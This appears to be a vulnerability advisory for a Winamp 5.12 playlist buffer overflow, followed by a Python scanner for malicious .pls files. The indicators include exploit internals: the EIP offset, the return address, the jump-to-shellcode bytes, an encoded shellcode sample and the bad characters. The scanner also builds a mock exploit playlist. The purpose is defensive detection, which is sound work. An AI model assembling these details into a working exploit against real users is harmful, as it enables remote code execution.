CVE-2006-0476
published 2006-01-31

CVE-2006-0476: Buffer overflow in Nullsoft Winamp 5.12 allows remote attackers to execute arbitrary code via a playlist (pls) file with a long file name (File1 field).

Priority: P3 54 · high
CVSS 2.0: 7.6 (vector AV:N/AC:H/Au:N/C:C/I:C/A:C)
Exploit: public (Metasploit module, see Detection & IOCs)
EPSS: 74.51% (99.4th percentile)

Affected

18 ranges
Vendor: nullsoft · Product: winamp (the version range and fixed-in columns of the 18 ranges are not populated on the source page)

Detection & IOCs (extracted from sources)

Return address (Metasploit target "Winamp 5.12 Universal"): 0x0d45fece
Bytes (jump-to-shellcode sequence):
\x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4
Bytes (encoded payload sample; the \x29\xc9\x83\xe9..\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e prefix is the Metasploit x86/call4_dword_xor decoder stub):
\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21\x61\xdd\x0e\x4d
Bytes (ESP-restore prefix, XCHG ECX,ESP):
\x87\xe1
  • Malicious .pls playlist file delivered via browser containing a UNC path (\\<long_computer_name>) in the File1= field with a computer name of ~1026 bytes, overwriting EIP at offset 1022.
  • Detect .pls playlist files where the File<N>= field begins with \\\\ (UNC path) and the computer name component exceeds 1022 bytes — indicative of buffer overflow exploitation.
  • Payload bad characters for this exploit are null byte, backslash, forward slash, CR, LF, and space (\x00\x5c\x2f\x0a\x0d\x20); encoded shellcode in .pls UNC field will avoid these bytes.
  • The exploit prepends \x87\xe1 (XCHG ECX,ESP) to the payload encoder to restore ESP from ECX after landing on the \x5c\x5c UNC prefix trashes ESP; presence of this two-byte sequence at the start of shellcode in a .pls file is a strong indicator.
  • The Metasploit module supports a PlaylistSpaceInjection evasion option that inserts random spaces/tabs around keys and values in the playlist; detect .pls files with abnormal whitespace around '=' delimiters.
  • The jump-to-shellcode sequence \x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4 appears at a fixed offset within the malicious .pls UNC computer name field; scan .pls file content for this byte pattern.
  • The Metasploit return address (0x0d45fece) is specific to the Winamp 5.12 Universal target only. Its high byte 0x0d is CR, one of the bad characters, and is replaced by 0x00 when Winamp processes the field; the exploit relies on this, so the address actually used is 0x0045fece.
  • The Metasploit module was only successfully tested against Winamp 5.11 and 5.12; payload space is limited to 526 bytes.
  • NOP sleds are explicitly disabled in the Metasploit payload configuration so that the ECX register, which the \x87\xe1 prefix uses to restore ESP, is not modified.
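The detection bullets above can be turned into a small file scanner. The following is an added example written for this page, not code from the cvebase page, from Winamp, or from the Metasploit module: it parses a .pls body line by line, tolerates the PlaylistSpaceInjection whitespace evasion, extracts the UNC computer-name component of each File<N>= field, and applies the length, XCHG ECX,ESP and jump-stub indicators quoted above. The two sample playlists are constructed for the example; the malicious one uses 'A' filler where the real exploit carries encoded shellcode, so its exact layout is an assumption, not a capture.

```python
import re

# Indicators quoted in the Detection & IOCs list of this page.
JMP_STUB = b"\x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4"  # jump-to-shellcode sequence
XCHG_ECX_ESP = b"\x87\xe1"                                       # XCHG ECX,ESP prepended to the payload
EIP_OFFSET = 1022                                                # EIP overwrite offset in the computer name
RET_LE = (0x0d45fece).to_bytes(4, "little")                      # b"\xce\xfe\x45\x0d"

# File<N>= line, tolerant of the PlaylistSpaceInjection evasion (spaces/tabs
# around the key, the '=' and the value). bytes.splitlines() splits only on
# \r, \n and \r\n, so the 0x0d (CR) high byte of the return address simply
# ends the line, which is also where Winamp stops reading the field.
FILE_KEY_RE = re.compile(rb"^[ \t]*File(\d+)[ \t]*=[ \t]*(.*?)[ \t]*$", re.IGNORECASE)
INJECTED_WS_RE = re.compile(rb"^[ \t]|[ \t]=|=[ \t]")


def file_entries(data):
    """Yield (index, value, raw_line) for each File<N>= entry in a .pls body."""
    for raw in data.splitlines():
        m = FILE_KEY_RE.match(raw)
        if m:
            yield int(m.group(1)), m.group(2), raw


def unc_computer_name(value):
    """Return the computer-name component of a UNC path (\\\\host\\share...), else None."""
    if not value.startswith(b"\\\\"):
        return None
    return value[2:].split(b"\\", 1)[0]


def scan_pls(data):
    """Return a list of (rule, detail) findings for one .pls file body."""
    findings = []
    if JMP_STUB in data:
        findings.append(("jmp_stub", "jump-to-shellcode byte sequence present"))
    for idx, value, raw in file_entries(data):
        if INJECTED_WS_RE.search(raw):
            findings.append(("whitespace_injection",
                             f"File{idx}: whitespace around key/'=' (weak indicator)"))
        host = unc_computer_name(value)
        if host is None:
            continue
        if len(host) > EIP_OFFSET:
            findings.append(("unc_name_overflow",
                             f"File{idx}: UNC computer name is {len(host)} bytes (> {EIP_OFFSET})"))
        if host.startswith(XCHG_ECX_ESP):
            findings.append(("xchg_ecx_esp",
                             f"File{idx}: computer name starts with XCHG ECX,ESP"))
    return findings


def is_suspicious(data):
    """True when any high-confidence rule fires; whitespace alone is not enough."""
    return any(rule != "whitespace_injection" for rule, _ in scan_pls(data))


# Constructed samples (assumed layout, not captures of the real exploit).
SAMPLE_BENIGN = (
    b"[playlist]\r\nNumberOfEntries=2\r\n"
    b"File1=C:\\Music\\track.mp3\r\n"
    b"File2=\\\\fileserver\\share\\song.mp3\r\n"
)
SAMPLE_MALICIOUS = (
    b"[playlist]\r\nNumberOfEntries=1\r\n"
    b"File1 = \\\\" + XCHG_ECX_ESP + b"A" * (EIP_OFFSET - len(XCHG_ECX_ESP))
    + RET_LE + JMP_STUB + b"\r\n"
)

if __name__ == "__main__":
    for name, body in (("benign", SAMPLE_BENIGN), ("malicious", SAMPLE_MALICIOUS)):
        print(name, is_suspicious(body), scan_pls(body))
```

The length rule is the one worth keeping on its own: a computer name longer than 1022 bytes has no legitimate use, while the byte-pattern rules only catch this specific Metasploit build and the whitespace rule fires on hand-edited playlists too.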